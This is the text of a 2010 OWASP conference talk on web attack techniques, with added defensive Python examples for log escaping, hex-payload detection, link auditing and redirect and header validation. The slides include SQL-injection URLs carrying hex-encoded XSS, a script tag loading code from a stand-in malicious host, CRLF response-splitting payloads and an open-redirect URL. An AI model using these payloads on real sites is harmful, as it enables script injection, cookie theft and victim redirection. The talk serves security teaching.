Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities

Aditya K Sood
SecNiche Security Labs
Sr. Security Practitioner, Armorize
adi_ks [at] secniche.org

OWASP AppSec 2010, University of California, Irvine, CA, USA
September 10, 2010

Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation
http://www.owasp.org
Disclaimer

All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current or any of my previous employers.




Dependency
  – Web penetration testing plays a critical role in assessing the applied security.
  – Vulnerabilities in deployed products matter a lot.
  – Testing output depends on exploiting existing issues and discovering new flaws.
  – Attack classification remains the same, but the modus operandi of an attack varies.
  – Testing requires the creation of an attack surface.
About Me
  – Founder, SecNiche Security Labs
      http://www.secniche.org
      PhD Candidate at Michigan State University
  – Senior Security Practitioner, Armorize
      http://www.armorize.com
  – Worked previously for COSEINC as Senior Security Researcher and as a Security Consultant for KPMG
  – Author for HITB E-Zine, Hakin9, Elsevier, USENIX journals
  – Likes to do bug hunting and malware dissection
  – Released advisories to forefront companies
  – Active speaker at security conferences including RSA etc.
  – Blog: http://zeroknock.blogspot.com
Notification

All the vulnerabilities discussed in this talk are in the process of being patched.

This discussion is all about understanding the attack methods and using them further in a real-time environment.

All for learning and education purposes.
Agenda
  Web 2.0 – Walkthrough
    – Web 2.0 – The real world
    – Web 2.0 trends (vulnerability classification, state of browsers)
    – Web 2.0 – Exploitation shift
    – Web application security is not a separate component!
  Web Vulnerability Hunting (Exemplary)
    – Cross Interface Attacks (CIA) / attacking backend login consoles /
    – SQLXSSI – Fusion {XSS, SQL} / XSS payload in SQL parameters /
    – Document rendering attacks / exploiting content transformation /
    – Web widget interface flaws / testing the mini web playground /
    – Persistent redirection attacks / exploiting logout modules /
    – Declarative security manipulation / tampering browsers /
    – Insecure content inclusion / exploitation by behavior /
  Conclusion
Web 2.0 – The Present World
  Figure: components in the real world
Web Trends – Incidents Classification
  Figure: top web incidents/trends of 2009 and predictions for 2010 (stats by Breach)
Web Trends – Vulnerability Classes
  Figure: web vulnerability classification, 2009 (website stats by Cenzic)
Web Trends – Exploited Browsers
  Figure: web vulnerability classification, 2009 (stats by Cenzic)
Web 2.0 – Exploitation Shift
  Why?
    – System vulnerabilities are getting harder to exploit
    – Web 2.0 service platforms
    – Client-side exploitation – easy control through browsers
    – Origin of the web as a service standard
    – Increased business dependency on Web 2.0
    – Centralized platforms for content sharing from different resources
    – Online social networking
    – Wider window of exploitation through the web
    – Information gathering about targets is easy on the web
Web Application – Security Is Not Separate!
  Figure: a robust web application rests on Design, Development, Security, Privacy and Reliability together
Web Application Vulnerability Hunting
  Pillars
    – Design and development
    – Attack and exploitation
    – Patching and rebuilding
Cross Interface Attacks (CIA)
  – Hardware devices using admin interfaces.
  – Admin interfaces: {Web, FTP, Telnet}
  – Do we require all admin interfaces?
      » If web admin is allowed, what about the backend consoles?
      » Is URL restriction a good practice?
      » Is it advantageous to have backend consoles?
      » Does access control serve well?
  – CIA targets FTP/Telnet admin consoles.
  – Step by step, developing an attack surface.
  – Hardware devices – firewalls, disk stations, management systems etc.
Cross Interface Attacks (CIA)
  Attack base and considerations
    – Presence of an FTP/Telnet admin login console
    – Hardware appliances have a default error logging mechanism
    – Log interfaces are served in HTML without filtering
    – A bad design practice from a security point of view
    – The default nature of protocols such as FTP/Telnet helps in information gathering
  FTP truth
    – Collective username and password authentication
    – Followed to avoid enumeration of user accounts
    – No check on login attempts. No check on characters.
    – Usually, widely accessible.
      » Do you think access control is required?
Cross Interface Attacks (CIA)
  Attacking and testing
    – Gathering information about allowed characters
    – No aim to get authenticated
      » FTP 530 Login Incorrect is what we require.
    – Malicious payloads are used as username and password
      » Injections / scripts / iframes / DOM calls / persistent payloads
      » Inject whatever you want!
      » Good point for triggering CSRF attacks
    – Of course, authentication fails. The error gets logged.
    – Payloads become persistent. They can also be reflective.
    – Bad design practice – unencoded / unfiltered HTML rendering
      » Inappropriate web logging mechanism
    – Voilà! Something happens.
Cross Interface Attacks (CIA)
  Scrutinizing the default buffer
    – To determine the number of characters that are allowed
    – Supplying an excess of buffer in the FTP_USER_NAME input
    – FTP_PASS_WORD reflects the allowed FTP_USER_NAME
    – Injection points – {FTP_USER_NAME, FTP_PASS_WORD}
Cross Interface Attacks (CIA)
  Injecting payloads
    – Supplying payloads as credentials
    – Input points – {FTP_USER_NAME, FTP_PASS_WORD}
Cross Interface Attacks (CIA)
  What else?
    – Anything
    – Irrespective of the user's environment {OS / browser etc.}
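The root cause on the CIA slides is an appliance that writes whatever was typed as an FTP username into its log and then renders that log as unescaped HTML in the web admin console. The following is an added Python example (not code from the talk or from any appliance vendor) showing the defensive side: a parser for constructed failed-login log lines, the unsafe and the escaped renderer side by side, and a check that flags usernames carrying markup. The log format, IP addresses and payload strings are all constructed for this example.

```python
import html
import re
from dataclasses import dataclass

# Constructed sample of what an appliance's FTP daemon might write on an
# FTP 530 failure. The format is invented for this example; the user field
# is attacker-controlled because the daemon logs whatever was typed.
SAMPLE_LOG = """\
ftpd: FAILED LOGIN from 192.0.2.10 user="admin"
ftpd: FAILED LOGIN from 192.0.2.11 user="<script>alert(1)</script>"
ftpd: FAILED LOGIN from 192.0.2.12 user="<iframe src=//192.0.2.99/>"
"""

LINE_RE = re.compile(r'ftpd: FAILED LOGIN from (?P<src>[\d.]+) user="(?P<user>.*)"$')


@dataclass
class LoginFailure:
    src: str
    user: str


def parse_log(text):
    """Parse failed-login lines into records; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(LoginFailure(m.group("src"), m.group("user")))
    return entries


def render_unsafe(entries):
    """The bad design from the slides: raw log fields concatenated into HTML."""
    return "".join(f"<tr><td>{e.src}</td><td>{e.user}</td></tr>" for e in entries)


def render_safe(entries, max_len=64):
    """Escape every attacker-influenced field and bound its length, so the
    log viewer shows the payload as text instead of executing it."""
    rows = []
    for e in entries:
        user = html.escape(e.user[:max_len], quote=True)
        rows.append(f"<tr><td>{html.escape(e.src)}</td><td>{user}</td></tr>")
    return "".join(rows)


MARKUP_RE = re.compile(r"""[<>"']|javascript:""", re.IGNORECASE)


def suspicious_entries(entries):
    """Detection: a username carrying markup is never a legitimate account,
    so such entries are worth alerting on independently of the rendering fix."""
    return [e for e in entries if MARKUP_RE.search(e.user)]


if __name__ == "__main__":
    found = parse_log(SAMPLE_LOG)
    print(render_safe(found))
    for e in suspicious_entries(found):
        print("suspicious login attempt from", e.src)
```

Escaping at render time is the fix that survives whatever the backend protocol accepts; limiting the username length and the number of attempts, as the slides note the appliances did not, reduces the log noise but does not by itself make the viewer safe.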
SQLXSSI: Fusion {XSS, SQLI}
  Differential attack surface
    – How far can we go in using the standard vulnerabilities?
    – How many different ways of exploitation can be developed?
    – Why not fuse one vulnerability into another?
    – It's all about the game of payloads
  Triggering XSS through SQL injection
    – All types of XSS possibilities
    – A verbose SQLI vulnerability is the base
    – Errors with truncated SQL queries with parameters
    – XSS payloads injected in SQL parameters
    – Obfuscating payloads
    – Basically, an XSS injection using database semantics
    – Reflective in nature
SQLXSSI: Fusion {XSS, SQLI}
  Generalized pattern
    <script>alert(document.cookie)</script> =
    0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e

    http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x3c7363726970743e616c657274282f73636861702f293c2f7363726970743e,floor(rand(0)*2)) x from table-name groupby x)a)

    <script src="http://wwww.malicious.org/ex.js" /> =
    3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f65782e6a7322202f3e

    http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f65782e6a7322202f3e,floor(rand(0)*2)) x from table-name groupby x)a)
SQLXSSI: Fusion {XSS, SQLI} – Example (1)
  Figure: the error gets rendered in the browser
SQLXSSI: Fusion {XSS, SQLI} – Example (2)
  Figure: injected XSS payload in a SQL parameter
SQLXSSI: Fusion {XSS, SQLI} – Example (3)
  Figure: the injected payload starts downloading a malicious XLS file
SQLXSSI: Fusion {XSS, SQLI} – Example (4)
  Figure: an image with a malicious request is injected
SQLXSSI: Fusion {XSS, SQLI}
  Real world!
    – Websites are getting more susceptible to these issues
    – Vulnerability ratio exceeds 1:2
  Thanks to RB (1337) (http://www.schap.org) for initiating this type of attack surface
  So what!
    – One vulnerability can lead to another. Testing is inadvertent.
    – SQLI can be used in a differential manner
    – An advanced step in conducting XSS through SQLI
    – Database design matters
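The SQLXSSI pattern above hides the script tag inside a MySQL 0x... hex literal, so a filter that only looks for "<script" in the raw query string misses it. The following is an added Python example (not from the talk) of the detection logic a defender would run over access logs: it decodes every hex literal in the query string and checks the decoded text for markup. The log lines, the hostname and the "users" table name are constructed for the example; the injection in the second line is the same shape as the one on the slides but carries a plain alert(1) instead.

```python
import re
from urllib.parse import unquote

# Constructed web server access-log lines (not from the talk). The second
# one carries a hex-encoded <script> literal in the SQL injection, the
# pattern the slides call SQLXSSI; 0x41 in the third is a harmless "A".
SAMPLE_REQUESTS = [
    "GET /web_page/index.php?id=1 HTTP/1.1",
    "GET /web_page/index.php?id=1%20and(select%201%20from(select%20count(*),"
    "concat(0x3c7363726970743e616c6572742831293c2f7363726970743e,"
    "floor(rand(0)*2))x%20from%20users%20group%20by%20x)a) HTTP/1.1",
    "GET /search.php?q=0x41 HTTP/1.1",
]

HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")
MARKUP_RE = re.compile(
    r"<\s*(script|iframe|img|svg|object|embed)\b|javascript:", re.IGNORECASE
)


def decode_hex_literals(query):
    """Return the decoded text of every MySQL-style 0x... literal in a query string."""
    decoded = []
    for m in HEX_LITERAL_RE.finditer(query):
        digits = m.group(1)
        if len(digits) % 2:  # an odd digit count is not a valid byte string
            continue
        decoded.append(bytes.fromhex(digits).decode("utf-8", "replace"))
    return decoded


def classify_request(line):
    """Return (verdict, decoded literals) for one access-log line.

    verdict is "sqlxssi" when a hex literal decodes to HTML/JS markup,
    otherwise "clean"."""
    fields = line.split(" ")
    target = fields[1] if len(fields) > 1 else ""
    query = unquote(target.partition("?")[2])  # undo %xx encoding first
    decoded = decode_hex_literals(query)
    verdict = "sqlxssi" if any(MARKUP_RE.search(d) for d in decoded) else "clean"
    return verdict, decoded


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        verdict, decoded = classify_request(line)
        print(verdict, decoded)
```

Detection is the second line of defense; the first is not echoing database errors to the browser at all in production, and HTML-escaping any request data that is echoed, which removes the rendering step the attack depends on regardless of how the payload is encoded.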
Document Rendering Attacks
  Concept
    – Inability of existing filters used for content transformation
    – Inappropriate design of web applications
    – Mistake – using the browser as an editor for content rendering
    – Do you want to upload your resume in MS Word?
  Attack vector
    – Setting payloads as inline URL links in Office documents
    – The document is required to be viewed. Preview properties.
    – Primarily persistent in nature. User interaction is required.
    – MS Word, PowerPoint etc. all work well depending on the web application
    – Bypassing XSS filters through Office documents
      http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf
Document Rendering Attacks
  Figure: the payload is injected as a hyperlink
Document Rendering Attacks
  Figure: the document is edited in the enterprise web application
Document Rendering Attacks
  Figure: exploited
Document Rendering Attacks
  Case study
    XML-based authoring flaws
      – Vulnerability reported in the Scribd platform in 2009
      – Reported and patched
      – Scribd failed to implement a filter on payloads set in protocol handlers
      – Links directly injected and converted to XML
      – Lastly, compiled and displayed in the Flash player
  iPaper Platform XML-based Link Authoring Flaw – Scribd
  http://coseinc.com/en/index.php?rt=download&act=publication&file=design_inaccuracy_inside_ipaper_framework.pdf
XML Authoring Flaw – Case Study
  Figure: XML working model
XML Authoring Flaw – Case Study (Example)
  Figure: example
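Both the Office-document vector and the Scribd case study come down to the same missing check: a hyperlink target taken from an uploaded document is passed through content transformation and rendered without anyone validating its scheme. The following is an added Python example (not from the talk, Scribd or Microsoft) that audits the hyperlink relationships of a .docx, which OOXML stores in word/_rels/document.xml.rels, against an allowlist of URL schemes. The relationship XML is constructed for the example; the namespace and relationship-type URIs are the standard OOXML ones.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlsplit

# Constructed word/_rels/document.xml.rels content (not from the talk).
# In OOXML every hyperlink in a .docx resolves through such a relationship,
# so this part is where an upload filter can see the real link targets.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/profile" TargetMode="External"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:alert(document.cookie)" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="JAVA%09SCRIPT:alert(1)" TargetMode="External"/>
  <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
</Relationships>
"""

PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # everything else is blocked


def normalize_target(target):
    """Decode percent-encoding and drop control/whitespace characters that
    browsers ignore when parsing a scheme, so "java<TAB>script:" is caught."""
    return re.sub(r"[\x00-\x20]", "", unquote(target))


def hyperlink_verdict(target):
    """Allowlist on scheme: relative or scheme-less targets are blocked too,
    because an external hyperlink without a scheme is ambiguous to render."""
    scheme = urlsplit(normalize_target(target)).scheme.lower()
    return "allowed" if scheme in ALLOWED_SCHEMES else "blocked"


def audit_hyperlinks(rels_xml):
    """Map each hyperlink relationship Id to 'allowed' or 'blocked'."""
    root = ET.fromstring(rels_xml.encode("utf-8"))
    verdicts = {}
    for rel in root.iter(PKG_NS + "Relationship"):
        if rel.get("Type") == HYPERLINK_TYPE:
            verdicts[rel.get("Id")] = hyperlink_verdict(rel.get("Target", ""))
    return verdicts


if __name__ == "__main__":
    for rel_id, verdict in audit_hyperlinks(SAMPLE_RELS).items():
        print(rel_id, verdict)
```

A real upload filter would open the .docx with zipfile, run this audit over every *.rels part, and either reject the document or rewrite blocked targets before the converter turns them into XML for the viewer; checking the scheme after normalization is what closes the "protocol handler" gap the Scribd case describes.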
Web Widget Interface Flaws
  What lies beneath?
    Web widget
      – A snippet of HTML code embedded in a website. You can "copy" that code and "embed" it in your web page
      – A gadget is proprietary whereas a widget is freely available
      – Diverse functionalities – advertisements, traffic analysis, news, feeds, etc.
    Web widget code snippets
      – JavaScript
      – Adobe Flash plugins
      – Code for embedding Windows Media Player
      – Silverlight plugins
Web Widget Interface Flaws
  Insecurities
    Code specification issues
      – A widget or gadget can be designed insecurely
      – HTTP parameters play a crucial role in its working
      – Arbitrary code execution in the OS – scripting interface
      – Unsanitized, unfiltered, unverified data acceptability
    Interface with websites and triggering vulnerabilities
      – Understanding the design of the widget
      – The widget's interface with the primary website and how it works
      – Registered widgets and domain names in the database can cause security problems in the base website
Web Widget Interface Flaws
  Figure: web widget working layout
  The model looks simplistic in nature.
Web Widget Interface Flaws
  Case study
    Real-time issue in one of the most recognized vendors
      – The website is a leading service provider for news and advertisements
      – The widget is allowed to be installed on any custom blog or user website after the registration process. The widget code is changed based on the platform, such as Blogger, MySpace etc.
      – Once the registration is done, the widget snippet is provided to the user or customer for inclusion in his/her website
      – Now the content provider has a URL which redirects traffic from the primary website to the registered blog.
    A very bad design practice.
Web Widget Interface Flaws
  Attack scenario
    Details
      » The attacker registers his malicious blog with that content provider
      » Once it is registered, the widget is allowed to be included in the attacker-controlled website
      » The attacker starts using the content provider's link to redirect traffic to his blog, making victims vulnerable.
Persistent Redirection Attacks
  HTTP redirection
    – Automated redirection
    – What if the attacker controls it?
    – More effective – if persistent
Persistent Redirect Attacks
  Manipulating the logout module
    Details
      » Enterprise applications have inbuilt functionality to provide a pre-login parameter for inline redirection back to the application home page while logging out of the application
      » Careful analysis and design scrutiny helps the tester find parameters which provide a persistent state to set your value
      » The application does not verify the value provided in the redirect variable while logging into the application
      » Another variation of login redirection attacks, this one is a logout redirection attack
    OWASP 2010 A9
  HackintheBox (HITB) EZine – Open Redirect Wreck Off Paper
  http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf
Persistent Redirection Attacks
  Manipulating the logout module
    Layout
      – Vulnerability disclosed to one of the biggest vendors
      – Successfully exploited and triggered in a large number of applications

  https://www.example.com/XXX_YYYY/ret.jsp?_pc=STANDARD_WEB_PAGE_STAT&_pi=1800&kk_home_url=http://www.malicious.org

      – When the above URL is used to log into the application, the value of the kk_home_url variable becomes persistent.
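The logout-redirect flaw above and the widget case study a few slides earlier share one missing control: a redirect target that originates from a request parameter (or from a self-registered blog URL) is stored and later followed without being checked against what the application actually trusts. The following is an added Python example (not from the talk or any vendor) of that check as a defender would write it, covering the bypasses a naive "starts with /" test misses. The parameter name kk_home_url comes from the slide; the allowed host and the sample inputs are constructed.

```python
from urllib.parse import unquote, urlsplit

# Hosts the application (or, for the widget case, the content provider's
# registration database) is willing to send users to. Constructed value.
ALLOWED_HOSTS = {"www.example.com"}


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a same-site absolute path or an http(s) URL whose host
    is on the allowlist. Everything ambiguous is rejected."""
    if not isinstance(target, str):
        return False
    # Browsers treat backslashes like slashes in URLs; normalize before the
    # leading-slash check so "/\\evil.org" cannot pass as a local path.
    cleaned = unquote(target).replace("\\", "/")
    if any(ord(c) < 0x20 for c in cleaned):
        return False  # CR/LF/NUL have no place in a redirect target
    if cleaned.startswith("/") and not cleaned.startswith("//"):
        return True  # same-site relative path
    parts = urlsplit(cleaned)
    if parts.scheme not in ("http", "https"):
        return False  # rejects javascript:, data:, and scheme-relative //host
    if "@" in parts.netloc or parts.hostname is None:
        return False  # userinfo tricks like https://good.example@evil.example
    return parts.hostname.lower() in allowed_hosts


def resolve_logout_redirect(requested, default="/"):
    """Decide where to send the user after logout. The value stored at login
    (kk_home_url on the slide) is only honoured when it passes the check;
    otherwise the application falls back to a fixed landing page."""
    return requested if requested and is_safe_redirect(requested) else default


if __name__ == "__main__":
    for candidate in ["/XXX_YYYY/home.jsp", "http://www.malicious.org",
                      "//www.malicious.org", "https://www.example.com/x"]:
        print(candidate, "->", resolve_logout_redirect(candidate))
```

Validating at login time, before the value is persisted, and again at logout time when it is used, means a value that slipped into the session store through an older code path still cannot be followed.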
Declarative Security Manipulation
  Concept
    Operation – idea
      – The declarative model provides an extensible set of security parameters in the HTTP responses
      – Browsers can respond with a requested security mechanism
      – Declared by the developer as part of the web server or application running on the server. In this way, declarative security can provide both a portable and flexible security defense
    Why declarative security in HTTP response headers
      – Clickjacking attacks
      – XSS filtering issues
      – File downloading security
      – HTML content rendering
Declarative Security Manipulation
  HTTP response headers
    Clickjacking
      – X-FRAME-OPTIONS {SAMEORIGIN / DENY}
        » Don't allow the website to be framed
        » The browser automatically escapes the framing
      – X-XSS-PROTECTION {0 – disable | 1 – enable}
        » Triggers the inbuilt IE XSS protection
        » Nothing much to say about its insecurity
      – X-CONTENT-TYPE-OPTIONS {NOSNIFF}
        » Preventing script execution through images
        » Secure MIME interpretation
      – X-DOWNLOAD-OPTIONS {NOOPEN}
        » Disallowing opening of files from the internet
  Applied as HTTP response headers – HTTP response splitting attacks work appropriately (%0d%0a)
Declarative Security - Study
  Generic attack styles
    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>

    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Download-Open:%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>

    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Frame-Options:0 [No value]%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>

    http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Content-Type-Options:[no Value]%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>

  Provide any falsified value to bedazzle the real working of the security component in a browser.
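The attack styles above only work because a request parameter reaches a response header with its %0d%0a intact, which lets the attacker append or override the declarative security headers. The following is an added Python example (not from the talk or the referenced paper) with the two controls a defender wants here: a header builder that refuses CR/LF/NUL in names and values, and an auditor that parses a raw response head and reports whether each header from the slides is present with a valid value. The allowed-value sets are a simplified reading of those headers; the responses and the tampered value are constructed.

```python
import re

# Simplified allowed values for the headers the slides discuss, lower-cased
# for comparison. Real deployments may also see e.g. ALLOW-FROM or report=.
SECURITY_HEADERS = {
    "x-frame-options": {"deny", "sameorigin"},
    "x-xss-protection": {"0", "1", "1; mode=block"},
    "x-content-type-options": {"nosniff"},
    "x-download-options": {"noopen"},
}

CRLF_RE = re.compile(r"[\r\n\x00]")


def is_header_value_safe(value):
    """A header name or value containing CR, LF or NUL would split the response."""
    return not CRLF_RE.search(value)


def build_header_line(name, value):
    """Emit 'Name: value\\r\\n' only after refusing splitting characters, so a
    tampered request parameter can never add a second header of its own."""
    if not is_header_value_safe(name) or not is_header_value_safe(value):
        raise ValueError("refusing to emit a header containing CR/LF/NUL")
    return f"{name}: {value}\r\n"


def parse_response_headers(raw):
    """Parse a raw HTTP response head into a {lowercase-name: value} dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:  # skip the status line
        if not line:
            break  # the blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_declarative_security(headers):
    """Report each declarative security header as ok, missing, or invalid:<value>.
    An unexpected value (such as "0" for X-Frame-Options) is flagged because
    browsers silently ignore it, leaving the page unprotected."""
    report = {}
    for name, allowed in SECURITY_HEADERS.items():
        if name not in headers:
            report[name] = "missing"
        elif headers[name].lower() in allowed:
            report[name] = "ok"
        else:
            report[name] = "invalid:" + headers[name]
    return report


# Constructed responses (not captured from any real site).
GOOD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
    "<html></html>"
)
# What the tamper.pl parameter on the slide would inject if it were echoed raw.
TAMPERED_VALUE = "param1;\r\nX-XSS-Protection:0\r\n\r\n<html>"

if __name__ == "__main__":
    print(audit_declarative_security(parse_response_headers(GOOD_RESPONSE)))
    print("tampered value safe?", is_header_value_safe(TAMPERED_VALUE))
```

The auditor is what the feasibility study on the next slides does at scale across site responses; the builder is the fix on the application side, and modern server frameworks apply the same rejection of CR/LF in header values by default.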
Declarative Security - Study
  Feasibility study
    – Implementation of DS in the real world
    – To understand the scenario
    – To understand the adaptability
    – To estimate the risk to websites
  Paper released at USENIX CollSec (Collaborative Methods of Security and Privacy): http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf
Declarative Security - Study
  Feasibility study
    – Alexa top 1000 website responses
    – Google's GWS implements the most
  Figure: survey results
Content Delivery Networks – Stringency
  Content from third parties
    – Online advertisements
    – Video streaming content
    – Windows Media files (MP4, MP3) / QuickTime
    – Embedded Flash files
    – Inline frames used for rendering content
    – EMBED / OBJECT / FRAME – HTML/DOM supporting elements
Content Delivery Networks – Stringency
  Figure: Web 2.0 requirement
Content Delivery Networks – Stringency
  – Example – a malicious media player file can infect victims with malware once included from a third-party content network
  – Easy to bypass the filter
  Figures: setting the payload; the payload bypasses the XSS filter and starts downloading an XLS file
WWW Vulnerabilities - Circle
  Figure: a cycle with four stages – evolving complex technology, complex flaws, efficient hacks, testing and strengthening
Conclusion
  – Attacks on web infrastructure are increasing
  – More complexity, more problems
  – Security is a process and not a one-time shot
  – Design according to requirements
  – Test appropriately
Questions and Knowledge Sharing
Demonstrations - Available If Required
  Shared on an individual front.
Thanks
  – OWASP (http://www.owasp.org)
  – SecNiche Security (http://www.secniche.org)

OWASP AppSec USA 2011 - Dismantling Web Malware
 
OWASP Top10 2010
OWASP Top10 2010OWASP Top10 2010
OWASP Top10 2010
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request ForgeryOWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
OWASP Khartoum - Top 10 A5 - 7th meeting - Cross Site Request Forgery
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10  -2007Application Security Vulnerabilities: OWASP Top 10  -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
Problems with parameters b sides-msp
Problems with parameters b sides-mspProblems with parameters b sides-msp
Problems with parameters b sides-msp
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITIS
 

Mehr von Aditya K Sood

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareAditya K Sood
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodAditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineAditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
